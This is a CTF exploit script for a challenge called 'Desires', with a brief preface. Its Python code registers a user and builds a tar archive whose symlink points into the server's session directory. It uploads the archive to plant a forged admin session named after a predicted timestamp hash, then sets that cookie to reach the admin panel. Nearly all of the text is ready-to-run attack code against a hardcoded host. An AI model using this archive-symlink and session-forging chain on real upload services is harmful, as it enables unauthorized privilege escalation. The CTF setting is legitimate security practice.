Project: Desires Exploit

🧠 Desires Exploit Script

This script demonstrates a multi-step exploit chain combining:

CVE-2024–0406 (Zip Slip)
Predictable session ID generation
Authentication logic flaw

It results in admin privilege escalation and flag retrieval on the Desires CTF challenge.

import time
import hashlib
import requests
import tarfile
import io
import json
import uuid
import sys

base_url = "http://94.237.53.203:43527"
s = requests.Session()

username = "user_" + uuid.uuid4().hex[:8]
password = "password"
register_data = {"username": username, "password": password}
print(f"[*] Registering user: {username}")
reg_resp = s.post(f"{base_url}/register", json=register_data)
if reg_resp.status_code != 200:
    print("[-] Registration failed"); sys.exit(1)

print("[*] Logging in post-registration...")
login_data = {"username": username, "password": password}
login_resp = s.post(f"{base_url}/login", data=login_data)
if login_resp.status_code != 200:
    print("[-] Login failed"); sys.exit(1)

session_cookie = s.cookies.get("session")
print(f"[+] Login successful, session: {session_cookie}")

target_timestamp = int(time.time()) + 3
session_id = hashlib.sha256(str(target_timestamp).encode()).hexdigest()
print("[*] Calculated session_id:", session_id)

archive_name = "malicious.tar"
payload_data = json.dumps({"username": username, "id": 3, "role": "admin"}, separators=(',', ':'))
try:
    with tarfile.open(archive_name, "w") as tar:
        symlink = tarfile.TarInfo("link")
        symlink.type = tarfile.SYMTYPE
        symlink.linkname = f"/tmp/sessions/{username}/{session_id}"
        tar.addfile(symlink)
        file_info = tarfile.TarInfo("link")
        file_info.size = len(payload_data)
        tar.addfile(file_info, io.BytesIO(payload_data.encode()))
except Exception as e:
    print("[-] Error creating TAR archive:", str(e))
    sys.exit(1)

print("[*] Uploading archive...")
with open(archive_name, "rb") as f:
    files = {"archive": (archive_name, f, "application/x-tar")}
    upload_resp = s.post(f"{base_url}/user/upload", files=files)
    print("[*] Upload response:", upload_resp.status_code)

delay = target_timestamp - int(time.time())
if delay > 0: time.sleep(delay)
print("[*] Attempting login with wrong password to trigger session ID")
s.post(f"{base_url}/login", data={"username": username, "password": ""})

s.cookies.set("session", session_id)
admin_page = s.get(f"{base_url}/user/admin")
print("[*] Admin panel status:", admin_page.status_code)
print(admin_page.text)